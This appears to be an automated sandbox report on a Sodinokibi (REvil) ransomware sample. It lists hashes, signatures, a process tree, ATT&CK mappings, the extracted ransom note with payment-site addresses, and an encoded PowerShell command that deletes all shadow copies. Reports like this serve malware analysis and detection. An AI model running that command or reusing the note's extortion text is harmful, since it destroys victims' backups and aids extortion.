Analysis

  • max time kernel
    144s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 14:29

General

  • Target

    735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe

  • Size

    324KB

  • MD5

    20defcd42cabf5da27a21dd342e58068

  • SHA1

    408cfabc99c350ad28def5475cfff5dc2de02543

  • SHA256

    735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c

  • SHA512

    8a6a2f462b9e5ecccae13ecf176c8d2ec93e1c535f3541aa9a39151ea7874e730bdb627b422fbe2ba1c51c98c9c5a2b35da79433fbe9105038836ca33f31814d

Score
10/10

Malware Config

Extracted

Path

C:\gd1aq3l21-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion gd1aq3l21. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9E5BFB7F58E30588 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/9E5BFB7F58E30588 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: VhVkd5uQJ/np1axSrCCNQbvjvwPT0AskRRrf7KQvr9N8zuLYP6qrMd6Vno6oPJqs NmBK+bjD0WW1xdzmPv85NP+GMYGXytEsAMP+9j+zwi9O7qOh/uoBA6KfjkNyEOUW H/GbDhJMwnu6uTUsMzaHIBPrRWdOmXh45z1muyU9DSfFw0ZGscfAvphMbtewizS5 kmUync6pENTiO5McbmZsQcKkT4MUGXaQ4PWHE0XeyWjbonI3m0aq8puYwQeHuWda lo8yGWGVMLjCpP8WdVYDlAD1Pw7veg0+Q1YB55+vwMKurbDFgGjGySsABUzxKGEl 0De4UNR2wW8nAxKMIPCMOlXOjHLm3FQn6oI2Bl4H3EUwTbILQpRf1V4akyT8CxP/ l+WFbWmoJf4VfpoPZT4ebFlKTTaOVlBHmsHI3UGhMUKfQrPKgcpCYD60s0RAqcOw TqL/0R9XDUa1ZzWTZCGRrFXXE5Gy765L8EQE7Scuh+GcSY3qFfWi4KAsVOUCCFYI zPs0OFHoFjbO3LpKX5Tn5lRnPU5WznoUIzXyceBfA62+t8vd0N4wsJetdlcC8cw3 WWQggwtsLsH8lqQwJeXTgSMW1Mjx2aSeMjTMsvDxlsd1gFafjKqL6OcVJIjXr91y XnOs9yud2t/WmmKzcimiPamXxob9MYyMTLZKtQNdrwy1H+BpPTpZ6K9UW4twmJKA Ik7KOWnbel9Vk+o7zP+QT82Uo3/gLS1QbnFohXoLmy38VBGRWKtMezSjulFrXRNB sZzzADRdqtqFMCs2zxt2MmvDU9dyYps5lhJuWdNp9uCSiz8pzugQgnvqULvY8E/K txsQkVlTZkfEOxUuOwyieXqWGo6bgu6xlcXs4AofXprxIIu0Lm2T212ijrD9X+8V +Ir5Bhbehe5VyAJ6hoYsyTTi5nwa8CZ2L5hA7ypsO1z8mkdmJFRQvJ/GlpnXxNMh 47mGYXKN3LcC0/DnlfIL5uayXD80n4wxYUb9+j543eeCpMJJPu24nW4CBB0aGsIh Yh6gZL4YxSNNyxE+ZbzOG1vPairxYhg/gHNWupMrCJBXTlx9G0etqa9+leltrXd/ ydUNvKhpLiVMTZqve+mWUWqReRZH0cZdEPAZvpodXEC06eSpTw4Pdskd2FERKk/I k46H+8I7PY6JFdrf9K4JXvOnII3ASHfoErkimcKwkWHZvbkbIHw0TtxmvQoxRng1 T2vHeZK2Z950DVyksK/vuBKzeamo9SgSfSy83VGeM26AUwIs5hDjsM6A8KSyfNF2 GTaZgvd0YTDXceNOO7+7jesj Extension name: gd1aq3l21 ----------------------------------------------------------------------------------------- !!! !!! !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9E5BFB7F58E30588

http://decryptor.cc/9E5BFB7F58E30588

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe
    "C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3716
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1172

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1892-114-0x0000000000140000-0x00000000001EE000-memory.dmp
      Filesize

      696KB

    • memory/2820-115-0x0000000000000000-mapping.dmp
    • memory/2820-121-0x000001C918390000-0x000001C918391000-memory.dmp
      Filesize

      4KB

    • memory/2820-126-0x000001C9326C0000-0x000001C9326C1000-memory.dmp
      Filesize

      4KB

    • memory/2820-132-0x000001C9305E3000-0x000001C9305E5000-memory.dmp
      Filesize

      8KB

    • memory/2820-131-0x000001C9305E0000-0x000001C9305E2000-memory.dmp
      Filesize

      8KB

    • memory/2820-138-0x000001C9305E6000-0x000001C9305E8000-memory.dmp
      Filesize

      8KB